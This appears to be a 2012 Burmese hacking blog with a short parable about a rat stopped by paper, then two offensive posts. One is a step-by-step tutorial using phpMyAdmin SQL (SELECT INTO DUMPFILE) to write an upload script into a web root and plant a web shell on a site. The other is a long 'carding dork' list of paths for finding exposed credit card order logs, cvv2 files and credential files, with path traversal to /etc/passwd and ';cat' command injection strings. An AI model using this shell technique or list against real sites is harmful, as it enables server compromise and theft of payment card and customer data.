Thursday, January 31, 2013

Myanmar art gallery(tawwinartgallery)

Myanmar art gallery is ..comming

http://www.tawwinartgallery.com

Tuesday, November 13, 2012

ၾကြက္နဲ႔စကၠဴ

ကၽြန္ေတာ္အိပ္ခန္းထဲ ၾကြက္တစ္ေကာင္၀င္ေနတယ္၊ၾကြက္က ၾကြက္သတ္ေဆးလည္း မစားသလို၊ေထာင္ေခ်ာက္နဲ႔လည္းဖမ္းမရဘူး။
ၾကြက္ကေတာ္ေတာ္လည္တဲ႔ၾကြက္လို႔ထင္တယ္၊ညညဆိုလည္းေသာင္းက်န္းလိုက္တာ ကၽြန္ေတာ္ေကာင္းေကာင္းမအိပ္ရဘူး
ဒါနဲ႔ၾကြက္ဖမ္းဖို႔ ၾကြက္ရဲ႕ လွဳပ္ရွားသြားလာမွဳေတြကို ကၽြန္ေတာ္ေလ႔လာရေတာ႔တယ္၊ ရက္အနည္းငယ္ၾကာ ေလ႔လာျပီးေနာက္
ၾကြက္ဟာ အိပ္ခန္းျပတင္းေပါက္ကတဆင္႔ ၀င္လာတယ္ဆိုတာ ကၽြန္ေတာ္သတိထားမိလိုက္တယ္၊ျပတင္းေပါက္က  ျခင္ဇကာကိုကိုက္ျဖတ္ျပီး
ေမွာင္စပ်ိဳးတာနဲ႔ ကၽြန္ေတာ္အခန္းထဲ႔ သူ၀င္လာတယ္။မိုးလင္းတာနဲ႔ သူျပန္ထြက္သြားတယ္။
မိတ္ေဆြတစ္ဦးကို ကၽြန္ေတာ္ဒီအေၾကာင္းေျပာၾကည္႔ေတာ့ သူကရယ္ျပီး "ဒါက လြယ္လြယ္ေလးပါ.. ၾကြက္ေဖာက္ထားတဲ႔အေပါက္ကို စကၠဴတစ္ခ်ပ္နဲ႔ကပ္ထားလိုက္ရံုပဲ႔"
လို႔အၾကံေပးတယ္။ သူ႕အေျပာကို သိပ္မယံုၾကည္ပံုမေပါက္တဲ႔ ကၽြန္ေတာ္ကိုၾကည္႔ျပီး သူက "တစ္ကယ္ေျပာတာ စမ္းလုပ္ၾကည္႔လိုက္ပါလို႔" ေျပာတယ္

မိတ္ေဆြရဲ႕အၾကံအတိုင္း ကၽြန္ေတာ္လုပ္ၾကည္႔တယ္၊ဒါေပမယ္႔ စိတ္ထဲသိပ္ျပီးဘ၀င္မက်ခဲ႔ဘူး၊ေမွာင္စပ်ိဳးတာနဲ႔ ကၽြန္ေတာ္ေစာင္႔ၾကည္႔မိတယ္
ပါးလ်တဲ႔ စကၠဴတစ္ခ်ပ္က ပါးနပ္တဲ႔ၾကြက္တစ္ေကာင္ကို တားနိုင္ပါမလား၊ တစ္ကယ္လည္း အေျခေနက ထူးျခားခဲ႔တယ္၊ျပတင္းေပါက္အျပင္ကၾကြက္ဟာ
အထဲကို၀င္မရလို႔စိတ္လွဳပ္ရွားျဖစ္ေနျပိး ဂနာမျငိမ္ျဖစ္ေနပါတယ္။တကယ္ေတာ႔ လက္သည္းေလးတစ္ခ်က္ ကုပ္လိုက္တာနဲ႔ ၊ေခါင္းနဲ႔သာသာေလး တိုးလိုက္ရံုနဲ႔ စကၠျပဲျပီးအထဲကိုသူ၀င္နိုင္ပါတယ္
ဒါေပမယ္႔ၾကြက္က အဲဒီလိုမလုပ္ခဲ႔ဖူး။သြားနဲ႔ပဲ႔ ကိုက္ျဖတ္တတ္တဲ႔သူအက်င္႔ကေျပာင္ေခ်ာေခ်ာ စကၠဴကို မကိုက္ျဖတ္တတ္ခဲ႔ဘူး။
စကၠဴေလး တစ္ခ်ပ္ေၾကာင္႔ သူ႔ရဲ႕ပါးနပ္မွဳေတြ အသံုးမ၀င္ေတာ႔တာ တစ္ကယ္႔အံၾသစရာပါပဲ႔

ေနာက္ပိုင္းမွာကၽြန္ေတာ္အိပ္ခန္းထဲ႔ အဲဒီၾကြက္ ထပ္ျပီးမ၀င္လာခဲ႔ေတာ႔ပါဘူး။စကၠဴတစ္ခ်ပ္နဲ႔သူတားဆီးခံလိုက္ရတယ္၊အဲဒီကိစၥနဲ႔ပတ္သက္ျပီး
"ဘာေၾကာင္႔" ဆိုတဲ႔ ေမးခြန္းက ကၽြန္ေတာ္ကို အခ်ိန္အေတာ္ၾကာ ႏွိပ္စက္ခဲ႔တယ္၊
    ေနာက္ဆံုးမွာ တစ္ဘက္သတ္ ေတြးေတာမွဳေၾကာင္႔ဆိုတာကို ကၽြန္ေတာ္ သေဘာေပါက္နားလည္ခဲ႔ပါတယ္၊ကၽြန္္ေတာ္တို႔ရဲ႕အခက္အခဲ႔၊အတားဆီးေတြဟာ
    ၾကြက္ကိုတားဆီးထားတဲ႔ စကၠဴတစ္ခ်ပ္လိုပါပဲ႔၊ အခက္အခဲ၊အတားဆီးနဲ႔ၾကံဳတဲ႔အခါ တစ္ဘက္သတ္ အေတြးေတြကို ကၽြန္ေတာ္တို႔ လွည္႔ေျပာင္းေပးခဲ႔မယ္ဆိုရင္
    ၾကံစည္မွဳအသစ္ေတြနဲ႔ စကၠဴကို အလြယ္တစ္ကူ ဆုတ္ျဖဲနိုင္မွာ ေသခ်ာပါတယ္
   
    မူရင္းေရးသားသူ (Xi Wan(Nan Shan ညေနသတင္းစာထဲ႔ကေကာက္နွုတ္ထားတာျဖစ္ပါတယ္)
    Copy from ႏိုင္းနိုင္းစေန ၏ သတၱိရွိတဲ႔ ပထမေျခလွမ္းစာအုပ္မွ
    ReWritten by Cyberoot
    www.cyberoot.blogspot.com
အဆင္ေျပၾကါပါေစ   

Sunday, November 11, 2012

Shell Upload via PhpMyAdmin



အရင္က shell ကို phpmyadmin ကတင္လို႔ရမွန္းမသိိခဲ႔ပါဘူး ေနာက္ေတာ႔လည္း အေျဖကရွိေနျပန္တယ္ .. တဲ႔ အေတာ္ကိုက်ယ္ျပန္႔ပါတယ္

ဒီ Tutorial ကို localhost မွာပဲ႔စမ္းသပ္ျပထားပါတယ္ online မွာလည္း 100% အလုပ္လုပ္ပါတယ္ online ကလိုင္းမေကာင္းလို႔မစမ္းျပတာပါ
စိတ္မရွိပါနဲ႔  ကၽြန္ေတာ္ကလက္ရွိ xampp Version information: 3.3.9 ကိုသံုးထားပါတယ္  concept ကေတာ႔တူတူပါပဲ႔
xampp သံုးျပီဆိုတာနဲ႔ phpmyadmin မွာ sql statement ေတြကို control လုပ္ဖူးၾကမွာပါ
ရည္ရြယ္ခ်က္က phpmyadmin ကေန website ေပၚ သို႔ server ေပၚကို shell တင္မွာပါ

Step1 =>အရင္ဆံုး php ဖိုင္နွစ္ဖိုင္ကိုစေရးရမွာပါ တစ္ခုက upload နဲ႔ ေနာက္တစ္ခုက userform ပဲ႔ျဖစ္ပါတယ္
upload.php ကိုအရင္ေရးရေအာင္
<?php
$uploaddir='C://xampp/htdocs/';
$uploadfile=$uploaddir . basename($_FILES['userfile']['name']);
if( move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))
{
    print '<body bgcolor=#000000></br></br><div align=center><font size=5></font></body>';
}else{
    print '<body bgcolor=#000000></br></br><div align=center><font size=5 color=#0000ff>';
}
?>

ေနာက္တစ္ခု form.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>Cyberoot  PhpMyAdmin upload shell</head>
<body bgcolor="#000000">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;">>>  &nbsp; Cyberoot  PhpMyAdmin upload shell!! </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>

 Step2 =>ဒုတိယကေတာ႔ document root ဆိုတာကိုရွာရပါမယ္ localhost မွာဆိုရင္ေတာ႔ http://localhost/xampp/phpinfo.php ဆိုတာရွိပါတယ္
 ကၽြန္ေတာ္မွာေတာ႔ ဖ်က္လိုက္တဲ႔အထဲပါသြားတယ္ ဒီေတာ႔ phpinfo.php ကိုအသစ္ျပန္ေရးျပီး htdocs ေအာက္မွာျပန္ထည္႔ၾကည္႔မယ္
 phpinfo.php
 <?php phpinfo(); ?>
 ဆိုတာေရးျပီး htdocs ေအာက္မွာ Save လုပ္လိုက္ပါ ျပီးရင္ localhost/phpinfo.php ဆိုျပီးေခၚၾကည္႔ေအာက္ကလိုမ်ိဳးေတြ႔ပါလိမ္႔မယ္

 ကၽြန္ေတာ္က C://xampp/htodcs ဆိုတဲ႔ ေအာက္မွာသိမ္းထားတာကိုျမင္ရမွာပါ တစ္ခ်ိဳက installation လုပ္ထားတဲ႔ directory မတူရင္ေတာ႔လမ္းေၾကာင္ေျပာငး္သြားပါလိမ္႔မယ္
 No Problem for dir , conecpt ပဲ႔လိုတာပါ

 Step3 =>ကၽြန္ေတာ္တို႔ database ထဲမွာ ၾကိဳက္တဲ႔နာမည္နဲ႔ database အသစ္တစ္ခုေဆာက္ရမွာပါ ကၽြန္ေတာ္ကေတာ႔ cyberdevil လို႔ေဆာက္လိုုက္တယ္


 Step4 =>Table နွစ္ခုကို cyberdevil ဆိုတဲ႔ database ေအာက္မွာထပ္ေဆာက္ေရးရပါမယ္
 userform table ကို track1 လိုနာမည္ေပးလိုက္ပါမယ္
 မလုပ္တတ္ဘူဆိုရင္ ေအာက္ကကုတ္ကို sql ထဲ႔ကူးထည္႔လိုက္ပါ Sql Code =>

CREATE TABLE `cyberdevil`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


ေနာက္တစ္ခု user_upload ဆိုတဲ႔ table ကို track2 နာမည္နဲ႔ထပ္ထပ္ပါမယ္ sql code :

CREATE TABLE `cyberdevil`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
ျပီးရင္ေတာ႔ေအာက္က ပံုလိုျဖစ္သြားမွာပါ


Step5 =>userform table ထဲမွာ sql injection ထည္႔ေပးမွာပါ insert into userform values (' inject code '); အဲဒီ statement ေလးသံုးပါမယ္
full inject code is
++++++++++++++++++++++++++++++++++
insert into userform values ('
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>Cyberoot  PhpMyAdmin upload shell</head>
<body bgcolor="#000000">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;">>>  &nbsp; Cyberoot  PhpMyAdmin upload shell!! </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>

');
++++++++++++++++++++++++++++++++++++++++
ေအာက္လိုမ်ိဳးျဖစ္သြားမွာပါ



ဒီေတာ႔ တစ္ခါတည္း file ကို dump လုပ္ရေအာင္
++++++++++++++++++++++++++++++++++++++++
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform
++++++++++++++++++++++++++++++++++++++++
ဆိုလိုတာက userform က data ေတြကို form.php နဲ႔ ျပပါလို႔ command ေပးလိုက္တာပါပဲ႔


ok! ဒါဆိုကၽြန္ေတာ္တို႔ document root ေအာက္မွာ form.php ဖိုင္ကို phpmyadmin ကေနေဆာက္လို႔ျပီးသြားပါျပီး
http://localhost/form.php  :)


ကဲ႔အခု upload လုပ္ၾကည္႔ပါဦး error တက္ေနေသးတယ္ေနာ္ ဟုတ္ပါတယ္ php upload funcion code ကိုမထည္႔ရေသးလို႔ပါ

ဆက္လုပ္ရေအာင္
Step 6=> user_upload ထဲ႔ကို sql inject လုပ္ပါမယ္ ေစာေစာကေရးထားတဲ႔ file upload script ေလးကို
INSERT INTO user_upload VALUES (" inject "); နဲ႔တြဲသံုးရမွာပါ
++++++++++++++++++++++++++++++++++++++++++++++++
INSERT INTO user_upload VALUES ("
<?php
$uploaddir='C://xampp/htdocs/';
$uploadfile=$uploaddir . basename($_FILES['userfile']['name']);
if( move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))
{
    print '<body bgcolor=#000000></br></br><div align=center><font size=5></font></body>';
}else{
    print '<body bgcolor=#000000></br></br><div align=center><font size=5 color=#0000ff>';
}
?>

");
++++++++++++++++++++++++++++++++++++++++++++++++

ေနာက္ပိုင္းေစာေစာကလုပ္ထားတဲ႔ statement ကို dump လုပ္ရဦးမွာပါ sql statement
++++++++++++++++++++++++++++++++++++++++++++++++
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
++++++++++++++++++++++++++++++++++++++++++++++++

user_upload ကို dump လုပ္ျပီးရင္ upload.php ဖိုင္လည္းအလုပ္လုပ္သြားပါျပီ ကၽြန္ေတာ္တို႔ shell တင္ဖို႔ပဲ႔က်န္ပါတယ္
ကၽြန္ေတာ္ကေတာ႔ကၽြန္ေတာ္ရဲ႕ ပထမဆံုး phpjackal shell  ဆိုတာကိုတင္ပါမယ္

ေအာက္မွာၾကည္႔ပါဦး lo.. Hack by ဘာညာဘာညာေပါ႔


Thanks for Reading
Written by Cyberoot
www.cyberoo.blogspot.com


Saturday, November 10, 2012

carding dork

store/log_files/your_order.log
/cgi-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/datasources/expire.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/orders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/your_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgibin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin/html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin/cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/Admin_files/expire.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin/Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin/pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin/admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin/admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/datasources/Expire.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/import.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win/shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-local/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/shop/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/shop/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/log_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.cgi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/metacart.mdb
/cgi-local/shop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/log/
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/scripts/c32web.exe
/cgis/orders/orders.txt
/logfile/
/shop_db/shopping.mdb
/shopping.mdb
/weblog/
/config/datasources/cvv2.mdb
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-sys/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgi-win/cart32.exe
/cgi-bin/loadpage.cgi
/dcshop/orders/orders.txt
/shop/show.php?q='
/cgibin/orders/orders.txt
/bin/pagelog.cgi
/cgi-bin/shop/orders/orders.txt
/_database/shopdbtest.asp
/cgibin/pagelog.cgi
/cgi-local/shop.pl/page=;cat%20shop.pl
/shop/search.php?q='
/cgi-sys/cart32.exe
/order13.txt
/weblogs/
/orderb/shop.mdb
/config/datasources/order.mdb
/store/cgi-bin/Admin_files/Store_user_lib.pl
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/Orders/order.log
/logs/access_log
/config/datasources/your_order.mdb
/ecommerce/admin/admin/admin.asp
/mall_log_files/order.log
/bin/cart32.exe
/htbin/DCShop/orders/orders.txt
/Admin_files/Authorize_Net.pl
/logging/
/database/
/cgi-sys/shop/auth_data/auth_user_file.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi-local/shop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-win/DCShop/orders/orders.txt
/store/Admin_files/Authorize_Net.pl
/cart/cart.asp
/bin/DCShop/orders/orders.txt
/scripts/pagelog.cgi
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb
/webcart/config/clients.txt
/dc/auth_data/auth_user_file.txt
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/bin/orders/orders.txt
/cgi-bin/Web_Store/web_store.cgi
/cgis/pagelog.cgi
/cgi-bin/orders/orders.txt
/merchant/shopdbtest.asp
/cgi-local/shop.pl/page=shop.cfg
/cgis/shop.pl/page=;cat%20shop.pl
/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd
/cg-bin/
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/ecommerce/admin/adminLeft/admin.asp
/webcart/orders/import.txt
/cgibin/shop/auth_data/auth_user_file.txt
/productcart/database/eipc.mdb
/mysql/cheersoundchdb.mdb
/cgi-bin/order.txt
/scripts/iisadmin/tools/mkilog.exe
/ProductCart/database/EIPC.mdb
/databases/
/cgi-sys/orders/orders.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/database/EIPC.mdb
//cgi-bin/orders.txt
/vpasp-shopcart/shopdbtest.asp
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/DCShop/orders/orders.txt
/mysql/shopping350.mdb
/_database/shopping.mdb
/htbin/cart32.exe
/PDG_Cart/shopper.config
/cgis/shop/auth_data/auth_user_file.txt
/shop/SHOPDBTEST.ASP
/bin/shop/orders/orders.txt
//cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/store/dcshop_admin.cgi
/_database/shopping400.mdb
/scripts/shop.pl/page=;cat%20shop.pl
/cgibin/PDG_Cart/shopper.conf
/cgibin/DCShop/orders/orders.txt
/cgibin/%20awstats.pl?output=keywords
/cgi/shop/orders/orders.txt
/cgi-bin/cart32_old.exe
/webshop/templates/cc.txt
/webcart/orders
/productcart/database/shop.mdb
/index.php?link=order
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/shopping/shopdisplayproducts.asp?
/ccbill-local.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/c32web.exe/CheckError?error=53
/server/admin_files/commerce_user_lib.pl
/shopping/shopdisplayproducts.asp?id=1&cat=order.log
/mail.cgi
/cgibin/admin_files/
/cgi-bin/mail/form.cgi
/cgibin/shopping/database/metacart.mdb
/globill/ver12otellog.txt
/cgi-bin/shopping.mdb
/shopping%20.mdb
/cgi-bin/mail.cgi
/cgi-bin/FORM.cgi
/cgibin/shop/database/metacart.mdb
/mail/form.cgi
/cgibin/shop/shopping350.mdb
/form.cgi
/shopping/cgi-bin/cart32.ini
/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/c32web.exe/ShowProgress
/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto
/cgibin/orders.txt
/cgibin/scripts/shop/shopping350.mdb
/form/mail.cgi
/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd
/webshop/logs/cc.txt
/form/form.cgi
/store/index.cgi?page=../../../../../../../../etc/passwd
/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail
/cgibin/%20awstats.pl?
/cgi-bin/Form.cgi
/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25
/admin.mdb
/cgi-bin/cart32.exe/error
/cgi/mail.cgi
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/csql/index.cgi?page=../admin/files/order.log
/cgi-bin/admin_files/
/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd
/admins.asp
/cgi-bin/cart_top
/cgi-bin/mail/mail.cgi
/shopadmin.asp
/cgi-bin/order.log
/mailform.pl
/cgibin/admin.pl
/vpasp/shopdisplayproducts.asp?
/policies1.htm
/cgi-bin/c32web_old.exe
/cgi-bin/c32web.exe
/cgi-bin/form/form.cgi
/cgibin/metacart.mdb
/shopdisplayproducts.asp
/cgi-sys/DCShop/orders/orders.txt
/ccbill6/secure/
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgi-bin/ibill.log
/ccbill6/
/password.txt
/cgi-bin/PDG_cart/card
/cgibin/www.google.com
/honeymoonhideaway.htm+honeymoon+charleston
/cgibin/awstats.pl%3Flang%3Dnl
/cgibin/admin.pl?setpasswd
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/%20awstats.pl?output=keywords
/shop/shopping450.mdb
/ccbill6/secure/ccbill.log
/cgibin/awstats.pl%3Flang%3Des%26update%3D1
/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf
/cgi-bin/form.cgi
/M83A
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awstats.pl%3Flang%3Dit
/orderdb/database/eipc.mdb
/cg-bin//eshop/database/order.mdb
/store/database/comersus.mdb
/cgibin/password.mdb
/~admin/guestbook
/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dnl
/cgibin/%20awstats.pl?output=keywords
/sumthin
/cgibin/cgibin/%20awstats.pl?output=keywords
/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/productcart/database/eipc.mdb
/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde
/mail/mail.cgi
/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl
/cg/.%20/comersus/database/comersus.mdb
/index%20of%20/%20productcart/database/eipc.mdb
/scripts/nsiislog.dll
/cgibin/order.cgi
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/cgi-bin/awstats.pl%3Flang%3Dde
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgibinserver/admin_files/commerce_user_lib.pl
/cgibin/store/Admin_files/myorderlog.txt
//cgibin/orders.txt
/cgibin/database/shopping.mdb
/cgibin/shopping/shopadmin.asp
/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgibin/allmanageup.pl
